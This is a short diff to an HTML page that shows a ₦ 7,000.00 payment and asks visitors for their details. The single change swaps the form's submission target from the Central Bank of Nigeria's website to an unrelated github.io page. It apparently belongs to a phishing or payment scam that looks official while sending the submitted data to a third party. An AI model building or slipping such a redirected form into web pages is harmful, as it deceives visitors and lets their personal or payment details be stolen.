--- a/index.html
+++ b/index.html
@@ -60,7 +60,7 @@ input:focus {
         }
 </style>
 <center>
-<form action="https://www.cbn.gov.ng">
+<form action="https://ricchis.github.io/pfunderpayment.github.io">
     <br>
 <h5>Kindly provide your details to send</h5><br>
 <p style="font-weight: normal;"><h1>₦ 7,000.00</h1></p>
